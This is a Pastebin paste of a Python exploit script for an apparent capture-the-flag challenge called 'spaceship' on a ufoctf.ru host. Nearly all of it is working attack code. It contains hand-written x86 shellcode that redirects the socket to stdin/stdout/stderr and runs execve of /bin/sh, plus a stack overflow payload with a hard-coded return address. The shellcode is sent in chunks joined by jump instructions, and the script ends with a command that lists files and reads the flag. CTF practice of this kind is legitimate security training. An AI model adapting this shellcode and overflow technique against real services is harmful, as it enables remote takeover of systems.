Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # aXs^Big-Daddy - http://codezen.fr
- import socket
- import telnetlib
- from struct import pack,unpack
- import time
- shellcode = ''
- # Save ptr to stack
- shellcode += "\x89\xcf" # mov edi,ecx
- # dup2(4,x)
- shellcode += "\x31\xc0" # xor eax,eax
- shellcode += "\x31\xdb" # xor ebx,ebx
- shellcode += "\x31\xc9" # xor ecx,ecx
- shellcode += "\xb1\x02" # mov cl, 0x2
- shellcode += "\xb0\x3f" # mov al, 0x3f
- shellcode += "\xb3\x04" # mov bl, 0x4
- shellcode += "\xcd\x80" # int 80h
- shellcode += "\xb1\x01" # mov cl, 0x1
- shellcode += "\xb0\x3f" # mov al, 0x3f
- shellcode += "\xb3\x04" # mov bl, 0x4
- shellcode += "\xcd\x80" # int 80h
- shellcode += "\xb1\x00" # mov cl, 0x0
- shellcode += "\xb0\x3f" # mov al, 0x3f
- shellcode += "\xb3\x04" # mov bl, 0x4
- shellcode += "\xcd\x80" # int 80h
- # execve
- shellcode += "\x89\xfb" # mov ebx,edi
- shellcode += "\x31\xc9" # xor ecx,ecx
- shellcode += "\xf7\xe1" # mul ecx
- shellcode += "\xb0\x0b" # mov al,0xb
- shellcode += "\x90\x51" # push ecx
- shellcode += "\x01\xC3" # add ebx,eax
- shellcode += "\x43\x43" # inc ebx ; inc ebx
- shellcode += "\x43\x43" # inc ebx ; inc ebx
- shellcode += "\x43\x43" # inc ebx ; inc ebx
- shellcode += "\x43\x43" # inc ebx ; inc ebx
- shellcode += "\x43\x90" # inc ebx
- shellcode += "\x89\xDF" # mov edi,ebx
- shellcode += "\x47\x47" # inc edi;inc edi
- shellcode += "\x47\x47" # inc edi;inc edi
- shellcode += "\x47\x47" # inc edi;inc edi
- shellcode += "\x47\x90" # inc edi
- shellcode += "\x31\xc0" # xor eax,eax
- shellcode += "\xAA\x90" # stosb
- shellcode += "\xb0\x0b" # mov al,0xb
- shellcode += "\xcd\x80" # int 0x80
- # filler
- shellcode += "\x90" * 256
- host = 'spaceship.tasks.ufoctf.ru'
- port = 4141
- tn = telnetlib.Telnet(host, port)
- time.sleep(1)
- s = tn.get_socket()
- print tn.read_until("Name your spaceship:")
- message = "/bin/sh\xFF" # shipname
- message += 'Y' * 4 # ptr, will be overwritten
- message += pack('<I', 4) # fd
- message += 'Z' * 4
- message += pack('<I', 0x0804B074) # EBP
- #message += pack('<I', 0xbfffeea4) # jump to shellcode
- message += pack('<I', 0xbfe67e24) # jump to shellcode
- s.send(message)
- print tn.read_until("Build your ship:\n")
- for i in xrange(0,75):
- message = shellcode[(74-i)*2:(74-i)*2+2] + "\xEB\x2C"
- print i, repr(message)
- s.send(message)
- time.sleep(3)
- while True:
- a = s.recv(1)
- if a == "\xFF":
- break
- ptr = unpack('<I', s.recv(4))[0]
- print "ptr=", hex(ptr)
- print "dummy=", s.recv(8)
- ptr = unpack('<I', s.recv(4))[0]
- print "ptr=", hex(ptr)
- ptr = unpack('<I', s.recv(4))[0]
- print "ptr=", hex(ptr)
- time.sleep(3)
- s.send("ls -la;cat k3y\n")
- while True:
- data = s.recv(1024)
- if data:
- print data
- else:
- break
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement